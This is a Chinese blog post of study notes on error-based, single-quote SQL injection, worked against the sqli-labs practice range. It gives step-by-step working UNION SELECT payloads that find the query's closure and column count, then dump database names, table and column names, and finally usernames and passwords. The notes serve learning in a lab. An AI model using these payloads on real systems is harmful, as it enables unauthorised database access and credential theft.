2. 程式人生 > 其它 >滲透學習筆記(三)--SQL注入學習(一)

滲透學習筆記(三)--SQL注入學習(一)

阿新 發佈:2022-01-17

@

目錄

使用靶場為sqli靶場
例題為GET - Error based - Single quotes - String(基於錯誤的GET單引號字元型注入)

sql注入常見攻擊思路

  1:尋找到SQL注入的位置

  2:判斷伺服器型別和後臺資料庫型別

  3:針對不同的伺服器和資料庫特點進行SQL注入攻擊

常見流程

  1. 首先判斷sql語句閉合方式

常見的閉合方式:
id = 'input_id'
id = ('input_id')
id = "input_id"
id = ("input_id")

判斷方法:
使用'或者"來進行判斷,如果輸入?id=1'

報錯,那就是單引號閉合,"類似。

如上圖,'報錯。

  1. 判斷回顯列數
    使用order by子句判斷返回的列數。
    ?id=1' order by 5 %23

%23#的url編碼,用來註釋掉另一個'
order by 5發現報錯
繼續嘗試
發現order by 3正常

  1. 判斷返回格式:

id=-1' union select 1,2,3 %23

發現2和3被回顯。

知道返回的列名之後,就可以執行後繼的操作和查詢各種資料了。

例如user()查詢使用者名稱,detabase()查詢當前的資料庫名,version()查詢資料庫版本

id=-1' union select 1,database(),version() %23

  1. 查詢出當前資料庫所有的表名

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) %23

其中group_concat()是用來把資料在一行中打印出來。
information_schema是mysql特有的庫,儲存各種資料庫的資訊

  1. 注入出某一個表中的全部列名
    id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='user') %23
  1. 獲得欄位內容

id=-1' union select 1,2,(select group_concat(Password) from users) %23

id=-1' union select 1,2,(select group_concat(username) from users) %23

本文來自作者:CK_0ff,轉載請註明原文連結:https://www.cnblogs.com/Ck-0ff/p/15815533.html

相關推薦

滲透學習筆記()--SQL注入學習

@目錄sql注入常見攻擊思路常見流程 使用靶場為sqli靶場 例題為GET - Error based - Single quotes - String(基於錯誤的GET單引號字元型注入)

PHP學習:PHP基礎

1、基本知識 PHP程式碼以 <?php ?> 的形式插入到HTML文件中,例如: <html> <head>

JavaSE學習筆記20:IO流

IO流 概述 I:Input O:Output 通過IO可以完成硬碟檔案的讀和寫 java中所有的流都是在:java.io.*下

尚矽谷java學習筆記之java面向物件2

比如,人這個抽象的概念,就是類個體物件有什麼樣的功能,取決於類是如何設計的!類就相當於java中的 最基本的細胞,屬性,方法相當於細胞中的線粒體之類建立好類以後,如何使用呢?測試類中定義一個ma

尚矽谷java學習筆記之java面向物件1

封裝:是面向物件的特徵之一,是物件和類概念的主要特性。就是把客觀事物封裝成抽象的類,並且類可以把自己的資料和方法只讓可信的類或者物件操作,對不可信的進行資訊隱藏。 繼承:面向物件程式設計 (OOP)

PHP學習:PHP基礎 字串操作、控制結構和引用檔案

、字串插入   1、雙引號 $a = \"a\"; echo \"I have $a\";   2、轉義字元 \\n 換行符

RestfulApi 學習筆記——.net core入門操作

前言 前面簡單介紹了一下restfulapi是什麼東西,那麼我們應該在.net core 中如何實現呢?或者說該怎麼做才能有這個restful api呢?

JavaSE學習筆記21:IO流

IO流 緩衝流瞭解 BufferedReader package se4.io; import java.io.BufferedReader; import java.io.FileReader;

Python機器學習筆記:奇異值分解SVD演算法

完整程式碼及其資料,請移步小編的GitHub   傳送門:請點選我   如果點選有誤:https://github.com/LeBron-Jian/MachineLearningNote

excel 賦值_Python 3 學習筆記:Excel 基礎操作

技術標籤:excel 賦值 賦值與取值 賦值 上面的操作都是針對工作薄及工作表的,但是我們知道在 Excel 檔案中,真正的資料都是儲存在單元格中的。

reserve函式python_python學習筆記5之越來越難函式

技術標籤:reserve函式python 5 函數語言程式設計 5.1高階函式:可以用其他函式作為自己引數的函式

Java重溫學習筆記,Java8新增介面interface 的預設方法

Java 8 新增了介面的預設方法。簡單說,預設方法就是介面可以有實現方法,而且不需要實現類去實現其方法。我們只需在方法名前面加個 default 關鍵字即可實現預設方法。

Jetpack compose學習筆記之自定義layout佈局

,簡介 Compose中的自定義Layout主要通過LayoutModifier和Layout方法來實現。 不管是LayoutModifier還是Layout,都只能measure次它的孩子View。

Java學習筆記51——幫助文件API 製作陣列工具類

示例:製作陣列工具類ArrayTool /** * 工具類要把無參構造方法私有化然後工具類的方法用static修飾

【設計模式學習筆記】觀察者模式

觀察者模式 種設計模式主要解決的問題: 1, 建立型:解決“物件的建立” 2, 結構型:解決“類或物件的組合或組裝”

詳解SQL注入--安全

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

sql注入問題mysql

mysql中的sql注入問題 1、為什麼會出現這種問題?   利用特殊符號和註釋語法來繞過sql校驗

【MindSpore:跟著小Mi一起機器學習吧!】邏輯迴歸

小Mi學習,向上積極!在前面幾周的學習中,小Mi終於帶著大家完完整整學完了線性迴歸,同時小Mi也收到了大家的很多反饋,在後續的學習中,小Mi會一一改進的!今天我們就開啟新的章節學習—logistic迴歸(Logistic Reg

VUE的學習_從入門到放棄

、vue的功能及作用 工作方式如下 1.不用操作DOM 2.單頁面應用web專案 簡稱:SPA

學習CURL擴充套件功能的使用

其實 CURL 這個擴充套件本來也不打算寫得,畢竟這個也是大家最常用的功能之一的。不過既然是在刷文件,學習到了就分享出來吧,不要陷入“知識的詛咒”。本身自己的知識體系就不完整,說不定也有很多小夥伴和我一樣只